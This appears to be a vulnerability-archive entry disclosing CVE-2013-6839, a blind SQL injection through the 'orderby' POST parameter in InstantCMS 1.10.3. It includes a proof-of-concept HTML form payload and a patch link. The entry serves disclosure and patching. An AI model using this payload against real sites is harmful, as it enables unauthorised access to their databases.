vendor:
InstantCMS
by:
High-Tech Bridge Security Research Lab
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: InstantCMS
Affected Version From: 1.10.3 and probably prior
Affected Version To: 1.10.3
Patch Exists: YES
Related CWE: CVE-2013-6839
CPE: a:instantsoft:instantcms:1.10.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013
SQL Injection in InstantCMS: CVE-2013-6839
The vulnerability exists due to insufficient filtration of 'orderby' HTTP POST parameter passed to '/catalog/[id]' URL. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. Simple exploit code below uses blind SQL injection exploitation technique, and will display different order of records on the page if MySQL version is 5.*: <form action='http://[host]/catalog/2' method='post' name='main'><input type='hidden' name='orderby' value='(-pubdate*(substring(version(),1,1)=5))'><input type='hidden' name='orderto' value='asc'><input type='submit' id='btn'></form>
Mitigation:
Apply patch for InstantCMS 1.10.3: http://www.instantcms.ru/download/patch/security_update_for_iCMS_1.10.3_21-11-2013.zip InstantCMS 1.10.3 downloaded after 21/11/2013 is patched [without version/release modification] and is not vulnerable.